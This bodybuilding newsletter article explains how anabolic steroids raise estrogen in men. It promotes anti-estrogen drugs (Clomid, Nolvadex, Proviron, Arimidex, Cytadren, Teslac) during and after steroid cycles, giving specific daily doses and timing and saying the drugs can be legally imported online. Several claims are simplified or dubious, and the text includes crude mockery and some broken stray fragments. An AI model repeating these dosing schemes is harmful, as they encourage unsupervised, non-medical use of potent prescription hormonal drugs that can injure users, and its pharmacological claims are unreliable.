When you open the page in a browser, then the contents of the Panel appears with rounded corners.
The advantage of using the RoundedCorners extender is that it is cross-browser compatible. It works great with Internet Explorer, Opera, Firefox, Chrome, and Safari even though different browsers implement rounded corners in different ways. The RoundedCorners extender even works with an ancient browser such as Internet Explorer 6.
Getting the Latest Version of the Ajax Control Toolkit
The Ajax Control Toolkit continues to evolve at a rapid pace. We are hard at work at fixing bugs and adding new features to the project. We plan to have a new release of the Ajax Control Toolkit each month.
The easiest way to get the latest version of the Ajax Control Toolkit is to use NuGet. You can open the NuGet Add Library Package Reference dialog at any time to update the Ajax Control Toolkit to the latest version.
thanks for usefull information,ı search day by day this information
Yes, really great informative.your explaining techniques is very easy to understand. thanks..
the ajaxtoolkitcontrol.dll is created in the solution, copy to known forder, and set a reference to that library through the tool box, the result: all de control are created as tool, | http://stephenwalther.com/archive/2011/05/23/install-the-ajax-control-toolkit-from-nuget | CC-MAIN-2017-43 | refinedweb | 710 | 52.9 |
,
Meet poor Billy..
Monday's article, the Anti-Estrogens Report Card, was so popular
that some of you asked to hear Billy's story all over again. So here
it is... To understand what happened to poor Billy, in this issue of
EliteFitness.com News, we'll examine estrogen and its relationship to
male use of anabolic steroids - brought to you by EliteFitness.com and
my friend Grendel from Anabolic Extreme.
Also in this week's EFN, we'll look at drugs you can use to annihilate
estrogen in a blinding burst of anabolic goodness! Read on, unless of
course you actually want a career in the exotic dancing arts like our
friend Billy.
Why Billy Has Breasts: The Story of Estrogen!
Before we begin to talk about all the great benefits of anabolic steroids
I think it is important to take a moment to talk about side effects and
how to prevent them.. Most of
the actions of estrogens appear to be exerted via the estrogen receptor (ER)
of target cells, an intracellular receptor that is a member of a large super
family of proteins that function as ligand-activated transcription factors,
regulating the synthesis of specific RNAs and proteins. This process is almost
identical to the action by which anabolic steroids affect protein synthesis. (parabolan,
or in most people's cases Finaplex) convert into progesterone.
High dosages of steroids for prolonged periods also shut down the body's
natural production of certain hormones (particularly testosterone) when
steroid therapy is stopped the body attempts to establish homeostasis
by adjusting hormonal levels. The average ratio of testosterone to estrogen
in a healthy male is 100:1. When drugs increase the testosterone in the
body, the body will respond by increasing the estrogen in the body. Additionally,
estrogen circulates in the body bound to the protein SHBG (sex hormone
binding globulin) as does the testosterone. SHBG is produced in the liver
and use of steroids increases the production of this protein; which has
a very high receptor affinity for testosterone. With more SHBG in the
body, more testosterone is bound, becoming inactive as only free testosterone
can activate an androgen receptor. SHBG, however, has poorer receptor
affinity for estrogen and more active free estrogen circulates in the
body, further altering the hormonal balance. These effects of steroids
(i.e. the potential for conversion into estrogen, as well as the disruption
of the hormonal balance in the body) can cause serious side effects in
male users. Thus, steroid users seek ways to block this estrogen from
affecting them.
That is all a very nice and formal way of saying that you need to be taking
anti-estrogens when you are using steroids. See, without the anti-estrogens
you get all sorts of pleasant side effects, not limited to a nice pair of breasts
(with oh -so tender nipples) and extra body fat! Without anti-estrogens you
will end up like poor Billy, shaking his titties in the face of wealthy Japanese
businessmen. No, seriously, this chapter will explore how to effectively use
anti-estrogens to prevent many of the side effects that accompany anabolic
steroid usage.
The Drugs Are Your Friends
Oral clomiphene citrate (Clomid) is an ovulation stimulant used to treat ovulatory
failure in women. Oral tamoxifen citrate (Nolvadex) belongs to a class of antineoplastics
called antiestrogens. It is used to treat breast cancer. Body builders use
both of these drugs. Why on earth would they do that?
The answer is that both of these drugs are anti-estrogens. The term anti-estrogen
is a little inaccurate. This class of pharmaceutical does not engage in some
sort of matter/anti-matter reaction, annihilating estrogen in a blinding burst
of anabolic goodness. Rather, let us think of the classical anti-estrogen drugs
(such as nolvadex and clomid) as estrogen receptor antagonists (ERA). These
ERAs are chemicals that are close enough in structure to estrogen to fit into
the estrogen receptor site; however these chemicals do not have the same chemical
effect as estrogen. The result is that any estrogen produced by the body or
exogenous estrogen cannot find an open receptor site to attach to. The free-floating
estrogen then presents far less problems to homeostasis.
There is a lot of conflict over using nolvadex, clomid and other ERAs. The
regulation of estrogen-induced cellular effects is a multi-step molecular process.
The diversity of estrogen and anti-estrogen effects on cellular functions is
also modulated by tissue and gene specificity. This diversity of reaction may
be explained by different levels of molecular regulation, including the presence
of two distinct estrogen receptor isoforms (ER alpha and ER beta), their binding
to activator or co-repressor transcriptional proteins, and their affinity to
different DNA binding domains of target genes (estrogen responsive element
or API). These mechanisms may account for the specific responses to estrogens
or anti-estrogens according to tissue, cell or gene level.
Therefore, in English, a drug like nolvadex, which targets breast tissues,
is going to do a better job of preventing gynocomastia than is clomid. However
clomid has the benefit of boosting the levels of follicle stimulating hormone,
which helps restore the bodies natural testosterone levels and protects against
testicular atrophy.
Many people stop using their ERA drugs when they end the cycle. That is a terrible
idea. Clomid, as we have already discussed, helps immensely with your recovery
processes. But remember, there is almost always an estrogen backlash to having
been using testosterone drugs for so long. Therefore, many symptoms of high
estrogen levels appear after the cycle. I would continue to use both Clomid
and Nolvadex for up to 3 weeks after the last of the drugs have left your body.
Remember, if on Friday you take 500 mg of a longer acting drug like Sustanon,
then don't consider the following few weeks as truly off time. That is why
it is important to know how long the drugs are effective in your body and yet
another reason to switch to faster acting drugs in the last few weeks of a
cycle.
"Who!
Learn Everything at:!
Effective dosages of these two drugs are debated. I would recommend that
the two drugs be used together, Nolvadex at 20 mg per day, and clomid at
50 mg per day. If Nolvadex is used by itself, 20-40 mg are sufficient. 50-100
mg of clomid can be used if clomid is the only ERA drug. Clomid should be
used for two weeks after the last steroid injection to help return your body
to its natural hormonal state. Nolvadex and Clomid are mildly expensive,
but very available because they are not scheduled drugs and can be legally
imported.
There is a second class of drug used to combat estrogen side effects from
what is grandly called steroid therapy; there are aromatase inhibitors.
As mentioned previously in this chapter, the body can convert testosterone
into estrogen using the enzyme aromatase. This second group of drugs, which
I will call the inhibitors, prevents this process from occurring at all.
This class of medication is generally only prescribed for severe conditions
and is generally more expensive then any of the ERA.
Teslac, (testolactone), has fallen out of favor for several reasons. First
of all, almost one gram daily is needed to achieve sufficient estrogen
synthesis inhibition. This makes this a very expensive drug to use. Also,
it is currently a scheduled drug because it is a testosterone derivate.
Cytadren (aminoglutethimide) is a better choice, requiring dosages of between
250-500 mg per day to suppress estrogen synthesis. 250mg cytadren doesn't
cause significant desmolase inhibition, so there would still be cortisol
and other steroids, while estrogen is minimized! Cytadren is used therapeutically
to combat Cushing's syndrome because it also interferes with the body's
ability to synthesis cortisol. Sounds like fun, huh ... no cortisol, no
estrogen. What a fantastic environment. Tell that to Andreas Munzer! Cytadren
can cause cysts as well as effect things like blood clotting. It is reported
that Munzer used 1-2g(!) of cytadren/day! Therefore cytadren use should
be done with precision.
Arimidex (anastrozole) is a drug designed to combat second stage breast
cancer. It is an extremely potent drug; one pill per day is sufficient
to almost entirely inhibit estrogen in the body. However, the draw back
is that this one pill per day can cost you around ten dollars.
The final conclusion about inhibitors is that these are far more
powerful drugs then the ERA. All the drugs listed above effect a
much wider hormonal spread then the anti-estrogens and they are also
going to cost you a lot more. Of all the drugs mentioned, I think
that arimidex is the most useful drug for the body builder. Duchaine
helped promote cytadren, particularly because of its anti-catabolic
ability to suppress cortisol. But, even he acknowledged the double-edged
sword that this drug was. Too little cortisol is painful to the joints
and in the end, extremely dangerous. I would not recommend the use
of cytadren, but I have provided the moderate dosage schemes. The bottom
line: These are not drugs to pop like M&Ms.
The Argument Against Our Little Friends
But these drugs decrease your gains right? Damn it. I hate hearing that
phrase clutched to... you guessed it... peoples' breast like a mantra.
First of all, there is no way of telling what your gains would have been
like without nolvadex or clomid. The scientific evidence that gave rise
to this whole dispute (which I believe Duchaine had a hand in too) is that
in addition to its anti-estrogenic action requiring estrogen receptors
(ER) and leading to growth arrest of breast cancers, studies have previously
shown that the anti-hormone tamoxifen (nolvadex) is able to block EGF,
insulin and IGF-I mitogenic activities in total absence of estrogens. Thus
the excessive use of anti-estrogens will actually result in a loss of some
of the most anabolic of hormones (insulin and insulin-like growth factor
1). Steroid antagonists can inhibit not only the action of agonist ligands
of the receptors they are binding to, but can also modulate the action
of growth factors by decreasing their receptor concentrations or altering
their functionality.
Translation: Yes, you are probably compromising your anabolic state
by using ERA. But does that mean they shouldn't be used? No. I have
heard statements so ridiculous as "Don't use anti-estrogens, they cut into
your gains and cost too much. Just get surgery". Lovely, just fucking brilliant.
Sure, like surgery isn't going to cut into your workouts or your gains.
Anti-Estrogens
Lets consider the top drugs used to combat the estrogen based side effects
of anabolic steroids.
Clomid
Taken daily during a cycle as an anti-estrogen, dosages range between 50-100
mg per day if used exclusively. If combined with Nolvadex, 50 mg per day is
sufficient. For more information on this drug, see the chapter entitled Some
Specific Drugs Considered.
Nolvadex
If used alone then 20-40 mg are needed. Some athletes, because of evidence
that it negatively impacts various growth factors in the body, dislike this
drug. If combined with clomid, 10-20 mg are sufficient. For more information
on this drug, see the chapter entitled Some Specific Drugs Considered.
Proviron
This drug binds to androgen receptors but is also helps prevent excess testosterone
from converting into estrogen. I consider this effective when stacked with
either clomid or nolvadex. 1 pill will do if combined with either 50 mg of
clomid or 20 mg or nolvadex. On its own, I suggest at least 2 pills.
Arimidex
This is a very potent drug that prevents the body from converting testosterone
into estrogen. The drawback is that is very expensive. The minimum effective
dosage is around between a quarter and a half of a milligram/day. This drug
does not need to be combined with any other during the cycle; however I recommend
you begin using arimidex two weeks prior to commencing your cycle so that the
drug can effectively eliminate the enzyme that permits conversion of testosterone
to estrogen. Clomid is still useful in the post cycle period. For more information
on this drug, see the chapter entitled Some Specific Drugs Considered.
Remember, anti-estrogens are not scheduled. It is perfectly legal to
import them and there are many online resources that do this with accuracy
and reliability. Don't gamble with this aspect of your health and don't
start until you have all that you need to cover yourself throughout the
whole cycle. There is no excuse for not having plenty of clomid and nolvadex
on hand.
So, back to our fiend Billy. If he had only taken a few simple precautions,
he would not find himself in the predicament he is in now. What has Billy
been up to lately? Well, when last I heard from him, he was working at
the Hooters - and not in the kitchen I might add.
Yours in sport,
George Spellwin. | http://www.elitefitness.com/articledata/efn/032906.html | crawl-001 | refinedweb | 2,177 | 63.49 |
Users of this documentation should be aware that examples given in the docs are given with the expectation that they are being executed using gives examples of classes/functions that might display this behaviour.
1 + 1 # REPL will print out '2' to console 1 + 1 # Script will not return anything to the console print(1 + 1) # Both the REPL and a script will return '2' to the console
import ubinascii ubinascii.hexlify(b'12345') # REPL will print out "b'3132333435'" to the console ubinascii.hexlify(b'12345') # Script will not return anything to print(1 + 1) # or save variable to for later value = 1 + 1 # do something here... print(value) | https://docs.pycom.io/docnotes/replscript/ | CC-MAIN-2019-47 | refinedweb | 110 | 54.76 |
Rendering this test code, I can reliably crash POVRay.
-----------------------------------------------------------
#include "functions.inc"
global_settings { assumed_gamma 2.2 }
light_source { <0,1,0>*20, rgb <2,2,2>/2 }
light_source { <0.2,1,-0.8>*20, rgb <2,2,2>/1.7 }
#declare m=3;
parametric {
function { u*sin(v) }
function { 15*sqrt(pow(sin(m*v)*sin(u/2)/3,2)+
pow(cos(m*v)*m/u*sin(u/2)/3,2)) }
function { u*cos(v) }
<0.001,0>, <15,2*pi>
contained_by { sphere { 0, 15 } }
precompute 12 x,y,z
accuracy 0.000001
}
camera { location <0,0.3,-1>*8.3 up y look_at <0,0,0> }
-----------------------------------------------------------
The system in question is a Linux-ix86 (AthlonXP) box, compiler
is GCC-3.2.
The bug may not show up on you box because of it's nature:
The reason for the bug is uninitialized static data (yeah...).
The following patch will fix it:
----------------------------------------------
diff -urN povray-3.50c/src/fpmetric.cpp povray-3.50c-ww/src/fpmetric.cpp
--- povray-3.50c/src/fpmetric.cpp 2003-01-07 02:08:27.000000000 +0100
+++ povray-3.50c-ww/src/fpmetric.cpp 2003-06-20 23:29:54.000000000 +0200
@@ -124,7 +124,8 @@
static int PrecompLastDepth;
static DBL Intervals_Low[2][32], Intervals_Hi[2][32];
-static int SectorNum[32];
+static int SectorNum[32]={0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
+ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
/*****************************************************************************
@@ -357,7 +358,7 @@
}
/* Z */
- if ((SectorNum[i] < MaxPrecompZ) && (0 < SectorNum[i]))
+ if (SectorNum[i] < MaxPrecompZ)
{
low = PData->Low[2][SectorNum[i]];
hi = PData->Hi[2][SectorNum[i]];
----------------------------------------------
The first chunk simply sets up the static data to sane values.
It is important that these values are non-negative.
The second patch should be reviewed before getting applied.
It removes the check for SectorNum[i] being larger than 0.
The reason why I am including it here is that this looked to me as
if somebody did the most trivial patch for the problem I encountered
but it just cures the symptome, not the bug itself.
Looking at the code, there is no way how SectorNum[i] could get
negative.
Furthermore, the X and Y components do not have such a check,
only the Z component calculation does. Looks odd to me.
The only thing one should consider is that the check will prevent
SectorNum==0 from passing. I see no reason why this would be necessary
but experts should verify that.
Wolfgang
P.S. The code I've just read is a masterpiece of "code duplication".
That's not exactly good and tends to introduce bugs...
Should I post a patch...? | http://news.povray.org/povray.bugreports/thread/%3C3ef6b35d%40news.povray.org%3E/ | crawl-001 | refinedweb | 452 | 51.24 |
The Lines.NET is a logic game that targets .NET Compact Framework platform and may run under Windows CE.NET 4.0/4.1 and Pocket PC 2002/2003 operation systems.
Fig. 1. Appearance of Lines.NET game in Windows CE.NET emulator
The Lines.NET is an application with rules of traditional "color lines" game that was designed to run on mobile devices in .NET Compact Framework environment. The short description of these rules may be found below.
Fig. 2. Appearance of Lines.NET game in Pocket PC 2002 emulator
A color lines game takes place on a rectangle board with square cells. Usually it is 9x9 cells square board. Colored balls are placed on the board in random locations. Traditionally the game starts with 3 balls of random colors (see Fig. 3).
A player can select any ball on the board and move it to a free location if this location can be reached from a current ball's location. Each time player moves a ball 3 new balls appear in random positions on the board that still remain empty. The colors of new balls are randomly selected from a set of 6 (in classical color lines game) different colors.
Fig. 3. The traditional color lines playing field
Any ball on the board can be moved from its location to any free cell. The length of a route to reach a new location is unlimited. A ball can only go through empty cells and only in vertical and horizontal directions (see Fig. 4) in order to reach its new location. The ball will not be moved to a free cell if this cell is blocked by surrounding cells, which are occupied by other balls.
Player can move only one ball per step, though the length of this movement is not limited. At the end of each step a new set of balls appear on the board (usually it is a set of 3 balls with random colors).
Fig. 4. A ball can move only in horizontal and vertical directions
When balls of the same color compose a line of length 5 or more, this line will be removed from the board, player will be rewarded with score points, and set of new balls will be postponed until the end of a next movement. The lines to remove could be of any direction: horizontal, vertical and even diagonal.
If it happened that by the last movement two or more cross-over lines were completed then all of them will be removed from the game field.
The major player's goal is to achieve the highest score and get into a "hi score" list of the game. A player is rewarded by 1 point for each movement he or she does. 5 additional points assigned to the player's score if he/she managed to remove a line of 5 balls by his/her last movement. If player was able to remove more then 5 balls at once each extra ball will be rewarded with 2 extra points in arithmetical progression of increment 2. For example,
Thus the longer lines player composes the more points he or she receives, the closer he or she gets to the major goal.
However player should be careful with constructing long lines. Though the major goal is to achieve the highest score, the local goal of player is to do not get the board flooded with balls, because if there is no place on the board for new set of ball to appear the game will be over and no more chance to increase a score. Therefore player should try to keep the game board clean and remove lines of reasonable size.
Lines.NET is a "color lines" game that targets mobile devices with Microsoft ® Pocket PC 2002/2003 and Microsoft ® Windows CE.NET 4.0/4.1 operating systems. The key features of Lines.NET are highlighted here:
AppSettings
Before starting an installation process, make sure your mobile device is connected to PC station and connection is established via ActiveSync software. If you don't have ActiveSync installed, get the latest version here:
Download the latest release of .NET Compact Framework redistributable package, run installation process and follow further instructions that will appear during installation. The .NET Compact Framework 1.0 SP2 Redistributable might be found under this link:
You have two ways to install the Lines.NET on your mobile device.
The first one is to install a program from under you PC station. Simply run Lines_NET.exe file from Lines_NET_install.zip archive and follow installation instructions. Your mobile must be connected to the PC station and ActiveSync should be activated. Note that Lines_NET.CAB file is not needed if you install the application using Lines_NET.exe.
The second way is to copy Lines_NET.CAB file (you may find it in Lines_NET_install.zip archive) to your mobile device manually and then, using file explorer of your mobile device, find the location of copied cabinet file and start installation directly from the device.
The Lines.NET application is built with taking into account the classical MVC (model-view-controller) pattern. All classes of application are split into 4 namespaces.
This is a root namespace of Lines.NET application. It contains all classes that implements GUI forms and dialogs that are used in the game including MainForm class. The MainForm class, in addition to be a representation of a main form of Lines.NET and containing the main entry point for the application, also takes a role of controller by providing intercommunication between Model and View classes. It takes care of handling events from either sides and making decision where to redirect them to. Some other dialogs such as InputBox, AboutBox, HiScoreForm are also located in this namespace.
MainForm
InputBox
AboutBox
HiScoreForm
The only outsider among the classes in this namespace is AppSettings class that holds the currently running game settings and employs Properties class from Lines.Utils namespace to serialize them into settings.xml file on exit and read them from this file during startup. This class provides static getters and setters to all properties of Lines.NET application.
Properties
Lines.Utils
These classes are written for .NET Compact Framework only and cannot be used in .NET Framework environment except maybe AppSettings class. One must rewrite them in order to run the game in .NET Framework environment.
This namespace contains classes that present the core functionality of Lines.NET game. It consists of model classes from the MVC pattern point of view, such as Ball, Board, Game, etc. Classes that enclose game algorithms to find a shortest path and lines compositions on the board are placed here too.
Ball
Board
Game
These classes are absolutely independent of .NET Compact Framework specifics and might be freely used in .NET Framework environment.
This namespace contains visual controls that match to classes from the Lines.Core namespace to display them in .NET Compact Framework environment. For instance, BallCtrl is used to visualize a Ball object from the Lines.Core namespace. Note: these classes have some Compact Framework specifics and should be adjusted to be properly used in .NET Framework.
Lines.Core
BallCtrl
This namespace contains some useful classes that simplify some routine job, but doesn't actually belong to any of the namespaces listed above. One of those is a class to play sound files in .NET Compact Framework environment, which was adopted from web site ( Sound.cs). Thanks a lot to their developers who shared this code.
Another one might be interesting for your own application. It is a Properties class that provides a functionality to write and read application properties in XML format. The key feature of this class is native type support, so that you don't need to bother yourselves with formatting/parsing/casting strings to native types and vice versa.
PathHelper class, which is also located in this namespace, helps to find and use a location of application directory the application is launched from.
PathHelper
For more details please refer to the Lines.NET API documentation that you can find in "doc" folder of source code file from download section. As an option you may also read C# comments throughout the source code, which are reflected in the documentation.
While programming the Lines.NET game I have encountered several issues with usage of .NET Compact Framework, and some times had to use ad hoc decisions to solve them, because I couldn't find any proper solution.
First of those issues is operating system detection. Though the behavior of .NET Compact Framework applications under Pocket PC 2002/2003 and Windows CE.NET 4.0/4.1 is different I wasn't able to find out how can I programmatically detect the current operating system my application is running on from under .NET Compact Framework. Lines.NET is using configuration file to define the OS. However I'm sure there must be a way to detect it without this ad hoc.
The good example of different behavior could be a usage of SIP (soft input panel) in Pocket PC version: in order to give a user a possibility to fill up a form a SIP panel is used. SIP panel and button to display it appears on the screen only if the MainMenu object is placed on the form. Thus even though there is no need to have a context menu for a dialog one has to place a dummy MainMenu object, which looks just ugly in Windows CE.NET OS where SIP panel is not needed.
MainMenu
Another example of difference is MainMenu itself, under Pocket PC 2002/2003 it is placed at the bottom whereas under Windows CE.NET it is placed at the top of dialog and one should always take into consideration its size to place GUI components under menu. I wasn't able to find the way to detect a height of MainMenu object, hence again I had to put this property into configuration file of application.
The second major problem was revealed while using threads and creating dialogs out of non-main thread. The ball movement is run as in separate thread. By the end of the movement the game field is examined whether there is a place on the board for a next step, if there is no such the end of the game event is fired. The handler of a game over event is displaying a game over dialog and requests from player to enter his or her name in order to save the record. Then a new game started. That's the ideal scenario which is supposed to work just fine. However, after the dialog was shown from a side thread, the strange unnamed thread (I could see this while debugging the application) has been launched, this happens though only when a MainMenu is placed on displayed dialog. When player tries to close application the termination of this unnamed thread causes some strange Runtime Exceptions from inside of .NET Compact Framework core. It seems like an internal problem of .NET Compact Framework. In order to get rid of this problem the watch dog timer was used to determine the end of a game and display game over dialogs from the main thread.
There were a lot more problems, which were successfully resolved while developing Lines.NET.
Fig. 5. Appearance of Lines.NET in real life on a SIMpad device
Although the Lines.NET version 1.1 is released with the whole set of desired features there are some more of them is likely to see in the next versions, such as:
Lines.GUI.Preferences
Even though there are still some things to implement and improve one can already enjoy the game.
The list of devices where Lines.NET game has been successfully tested:
Here is a list of resources which are surely will be useful to anybody who develops applications for .NET Compact Framework platform:
Thanks a lot to my father whose eager to play "color lines" has encouraged me to write this application. The Lines.NET game is dedicated to my lovely dad. It is his birthday present from me along with SIMpad device you may see on the Fig. 5. He is a greatest fan of "color lines" game I've ever seen, though he always lacks a possibility to play it at the time he would like to.
It took me a while to finish with my present, but now I'm fairly glad that my father can enjoy. | https://www.codeproject.com/Articles/7031/Lines-NET-game?msg=825147 | CC-MAIN-2019-30 | refinedweb | 2,088 | 64.81 |
# Controlling Brushless Motors using a Linux computer or a PLC
In this video, we will look at how to connect brushless motor controllers to a Linux computer. Specifically, we will use a computer running Debian. The same steps would work for Ubuntu Linux and other Linux distributions derived from Debian.
I've got a small sensorless brushless motor, and a bigger brushless motor with a built-in absolute encoder. Lets look at how to control those from my Debian Linux computer.
Servosila brushless motor controllers come in several form factors with either a circular or a rectangular shape. The controllers come with a set of connectors for motors and encoders as well as for USB or CANbus networks.
The controllers can be powered by a power supply unit or by a battery. To spice up my setup, I am going to use a battery to power the controllers and thus their motors. The controllers need 7 to 60 volts DC of voltage input. If I connect the battery, the controllers get powered up. The small LED lights tells us that the controllers are happy with the power supply.
We need to connect the brushless motor controllers to the Linux computer. There are two ways to do that - via CANbus or via USB. Lets look at the USB option first. A regular USB cable is used. Only one of the controllers needs to be connected to a computer or a PLC.
Next, we need to build an internal CANbus network between the controllers. We are going to use a CANbus cross-cable to interconnect the controllers. Each controller comes with two identical CANbus ports that help chain multiple controllers together in a network. If one of the interconnected brushless motor controllers is connected to a computer via USB, then that particular controller becomes a USB-to-CANbus gateway for the rest of the network. Up to 16 controllers can be connected this way via a single USB cable to the same control computer or a PLC. The limit is due to finite throughput of the USB interface.
Lets plug the motors to their controllers. The simple sensorless motor has just three phase wires. The more complicated bigger motor comes with three phase wires, a ground wire, and an absolute encoder cable. For now, I will connect just the phase wires and the ground wire. The controllers come with blade terminals for connecting the motors. The terminals are designated as A, B, C and G. There are also soldering holes for the motor cables. Unplug the power supply before connecting the motors. Now, lets power up our motor controllers, and turn our attention to Debian Linux computer.
The controller connected to the computer appears to Linux as a virtual serial port. If we list all the serial devices in Linux, we shall find our controller in the list (`/dev/ttyACM0`):
```
ls -la /dev/tty*
```
The controllers use text messages to deliver telemetry data to the computer. We are going to look at the messages now. This command is supposed to display text messages that the controller sends to the computer.
```
cat /dev/ttyACM0
```
What happened is that Linux prevented us from accessing the serial port due to some default security restrictions. To lift the restrictions, we need to add the "user" account to a group called "dialout". The group lists the users who are allowed to access serial ports. You have to invoke administrative privileges to add yourself to the "dialout" group. Use the "adduser" command in Debian:
```
/usr/sbin/adduser user dialout
```
...or an equivalent "sudo usermod" command in Ubuntu:
```
sudo usermod -G dialout $user
```
Linux requires you to log out and log in again for the updated security permissions to go into effect.
Lets try display telemetry messages again. It worked this time. The controller encodes telemetry in a text string. We will look into the format of the string in a separate video.
One more thing. If you plug the USB cable, and then immediately try to connect to the serial port, you may observe a "Device Busy" error. The ghost error disappears on its own in a few seconds as you keep trying to connect to the port. This issue can be fixed.
What happens is that a standard Linux program called Modem Manager, automatically connects to the serial port thus preventing you from accessing it. The simplest way to fix the problem is to uninstall the Modem Manager:
```
apt-get purge modemmanager
```
Now that we have finished configuring Linux, we can install a graphical software tool called Servoscope. Un-zip the downloaded package in your home directory. Open a terminal, and go to the directory with un-zipped files. Launch the Servoscope program by executing this shell script in the following way:
```
./servoscope.sh
```
The Servoscope program provides means to configure your brushless motor controllers, read telemetry, send commands to the controllers, plot performance charts, and so on. Pick the name of the proper serial port in the drop-down menu, and click the "Connect" button. If the port is not listed in the drop-down menu, click the "Refresh" button.
Both controllers appear in a list of devices. Double-click on a device name to open a command and configuration window. The window has a telemetry and a configuration management sections. You can monitor multiple controllers at the same time. We will look into the Servoscope software with a great detail in a separate video. At this time, you may wish to check input voltage displayed in the telemetry section.
What I am going to show next is just a demo of the controller's auto-configuration function. I suggest that you watch a dedicated video regarding the Auto-Configuration function, since this topic requires some background information. From the drop-down menu, select the Auto-Configuration command. Specify a maximum phase-to-phase electric current that your motor can handle. Specify the number of poles your motor has. Click the Send button.
The motor produces a beep sound. The sound indicates the beginning of an auto-configuration procedure. The controller sends sounding electrical signals to the motor. This way the controller measures various characteristics of the motor, and then configures itself for this particular motor. The motor makes what looks like mysterious kong-fu moves during the auto-configuration routine. The motor accelerates to its maximum speed. Be careful as the motor is producing its maximum torque at this moment. The rapid accelerations may take place a few times during the auto-configuration procedure. The second beep sound indicates the end of the auto-configuration procedure.
Now we need to repeat the routine for the smaller motor. Switch to the other window. Pick Auto-Configuration command from the drop-down menu. Specify a maximum phase-to-phase electric current that your motor can handle. Specify the number of poles your motor has. By the way, these values normally come from the motor's datasheet. Click the Send button. This time the smaller motor produces the beep sound, and starts making the kong-fu moves.
The beauty of the Auto-Configuration function is that the controller automatically configures itself when commissioning a new motor. I suggest that you watch a separate video dedicated to pecularities of the Auto-Configuration routine.
Now that both controllers have been configured, I am going to send an Electronic Speed Control command to the bigger motor. Choose Electronic Speed Control command from the same drop-down menu. I specified speed as 20 electrical revolutions per second.Hit the Send button. Note that the program sends the commands to the serial port in a text format.The motor starts spinning with the commanded speed.
That's it for now. In this video we looked at how to connect brushless motor controllers to a Linux computer via USB. We will look at CANbus interface option in a separate video. | https://habr.com/ru/post/573644/ | null | null | 1,316 | 58.28 |
On Thu, 2007-06-28 at 00:43 +0200, Jacob Rief wrote: >.
Advertising
No objection, although it would be nice if we could find something nicer to rename "using" to than "using_". What about "using_clause" or "using_list"? You also changed "namespace" => "name_space" in builtins.h; is that necessary? > I wrote a patch which applies cleanly onto version 8.2.4 Patches should be submitted against the CVS HEAD code: we wouldn't want to apply a patch like this to the REL8_2_STABLE branch, in any case. BTW, I notice the patch also adds 'extern "C" { ... }' statements to a few random header files. Can't client programs do this before including the headers, if necessary? -Neil ---------------------------(end of broadcast)--------------------------- TIP 4: Have you searched our list archives? | https://www.mail-archive.com/pgsql-patches@postgresql.org/msg17226.html | CC-MAIN-2018-30 | refinedweb | 126 | 77.53 |
Hi! I'm new here.
I'm reading a book about C++ so I'm quite new to the language.
An exercise asks to write a simple "Turtle Graphics" program.
This program should be able to simulates very simple graphics thanks to the following commands:
Command Meaning
1 - Pen up
2 - Pen down
3 - Turn right
4 - Turn left
5 , n - Move forward n spaces
6 - Print 20-by-20 array
9 - End of data (sentinel)
Now, before I post my code, my questions:
- is the code clear? I'm not very happy about the two switch I use to decide the command and the direction (in the move function).
- I wasn't able to implement the fifth command in one line, I mean you have to write 5, ENTER and than the N. The exercise asks to do it in one line. How can I achieve that?
Thank you for any suggestion and please don't be gentle: I want to learn :)
My code:
#include <iostream> using namespace std; void printMap(void); void printCommands(void); void move(int); const int END = 9; const int commands[7] = { 0, 1, 2, 3, 4, 5, 6 }; int map[20][20] = { 0 }; bool penDown = false; int x = 0; int y = 0; int dir = 0; // 0 = N, 1 = E, 2 = S, 3 = O int main() { cout << "Welcome to the Turtle Graphics! Here's the list of commmands:" << endl; printCommands(); int command; int args; cout << "Enter a command: "; cin >> command; if (command == 5) cin >> args; while (command != END) { switch (command) { // print commands case 0: printCommands(); break; // set the pen down case 1: if (penDown) penDown = false; else cout << "The pen is already up." << endl; break; // pen up case 2: if (!penDown) penDown = true; else cout << "The pen is already down." << endl; break; // turn right case 4: dir = (dir + 1) % 4; cout << "The new direction is " << dir << endl; break; // turn left case 3: dir -= 1; if (dir < 0) dir = 3; cout << "The new direction is " << dir << endl; break; // move forward case 5: cout << "Moving forward by " << args << endl; move(args); break; // show the map case 6: printMap(); break; } cout << "Enter a command (0 to show commands): "; cin >> command; if (command == 5) cin >> args; } cout << "Bye bye!" << endl; return 0; } void move(int steps) { while (steps-- > 0) { switch (dir) { // N case 0: if (y > 0) y--; break; // E case 1: if (x < 20) x++; break; // S case 2: if (y < 19) y++; break; // O case 3: if (x > 0) x--; break; } if (penDown) map[y][x] = 1; } } void printMap() { for (int i = 0; i < 20; i++) { for (int j = 0; j < 20; j++) { if (x == j && y == i) cout << "X"; else if (map[i][j] == 0) cout << " "; else cout << "*"; } cout << endl; } } void printCommands() { cout << "0 - Show the commands available\n" << "1 - Turn up the pen\n" << "2 - Turn down the pen\n" << "3 - Turn left\n" << "4 - Turn right\n" << "5, n - Move therd of n tiles\n" << "6 - Show the drawing\n" << "9 - Exit program" << endl; } | https://www.daniweb.com/programming/software-development/threads/72953/need-some-hints-about-a-program | CC-MAIN-2017-34 | refinedweb | 500 | 73.34 |
Managing Parallel Development in Two Languages? 108
Abhaga asks: "I work for a technology startup and our research work is mostly done in Matlab. The technology has matured, and now we are looking to build prototypes and products in C++. However, the dilemma is about the further research work/enhancements to the system. Should they be done in Matlab and continuously ported to C++, or is it better to move to C++ once and for all, at this point of time? Anyone having experience with similar things, what should we keep in mind while deciding on one or other."
Ruby is worse (Score:1, Funny)
No, *THE* language for zealots today is Ruby. With a syntax that makes Perl seem easy and Fortran modern, a complexity that makes C++ seem simple, features of an uselessness that make Lisp seem practical, zealots are all abandoning Python for Ruby these days.
Re:Ruby is worse (Score:2)
---
Help me with my Ruby Sudoku Solver [markbyers.com]
Re:Ruby is worse (Score:2)
Probably stuff like
def r a;!(i=a=~/0/)?p(a):((?1..?9).map-(0..80).map{|j|a[ j]+(i-j)%9*
(i/9^j/9)*(i/27-j/27|i%9/3-j%9/3)*9}).map{|k|r$`
has something to do with people being turned off by Ruby... Besides, can't you write the same program in a shorter way using APL?
If you want to obfuscate, at least you should try to do it in a beautiful and elegant way, like this Perl program. [99-bottles-of-beer.net]
Who said anything about obfuscation? (Score:2)
I don't think so otherwise someone would have submitted it.
If you want to obfuscate
I don't. The idea was to make it as short as possible, not as unreadable as possible. If I wanted to make it unreadable, I'd use Perl, like you suggested.
Re:Ruby is worse (Score:3, Interesting)
Give me a break. Nobody writes Ruby that way.
